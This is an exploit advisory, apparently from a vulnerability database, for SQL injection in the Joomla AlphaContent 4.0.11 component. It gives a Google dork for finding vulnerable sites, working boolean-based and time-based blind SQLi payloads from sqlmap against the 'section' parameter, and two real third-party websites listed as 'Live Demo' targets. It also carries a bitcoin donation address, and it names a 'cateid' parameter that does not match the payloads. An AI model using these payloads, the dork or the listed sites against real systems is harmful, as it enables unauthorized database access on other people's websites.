Joomla COM_ALPHACONTENT 4.0.11 SQL injection Vulnerability *youtube

Published
Credit
Risk
2017.06.11
xBADGIRL21
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:index.php?option=com_alphacontent

+-----------------------------
+|R|A|M|A|D|A|N|K|A|R|I|M +-->
+-----------------------------
/ Exploit Title : Joomla COM_ALPHACONTENT 4.0.11 SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_alphacontent
# version : 4.0.11
# Tested on: [Ubuntu 17.04]
# MyBlog : http://xbadgirl21.blogspot.com
# Date: 11-06-2017
# video Proof : https://youtu.be/Wlwa9afLSJ8
\ To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
+-----------------------------
######################
/|X|B|A|D|G|I|R|L|2|1|/
######################
| [+] PoC : |
+#####################
| [cateid] Get Parameter Vulnerable To SQLi
+ http://127.0.0.1/index.php?option=com_alphacontent&section=8&Itemid=227&lang=uk
+#####################
| [+] SQLmap PoC:
+#####################
+Parameter: section (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: option=com_alphacontent&section=1' AND 6151=6151 AND 'xCYf'='xCYf&Itemid=1&lang=en-us
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: option=com_alphacontent&section=1' AND SLEEP(5) AND 'jOoI'='jOoI&Itemid=1&lang=en-us
---

#####################
/ [!] Live Demo : /
#####################
+ http://www.waliwa.com/index.php?option=com_alphacontent&section=1&Itemid=1&lang=en-us
+ http://www.sworld.com.ua/index.php?option=com_alphacontent&section=8&Itemid=227&lang=uk
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers
#####################

References:

https://youtu.be/Wlwa9afLSJ8


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com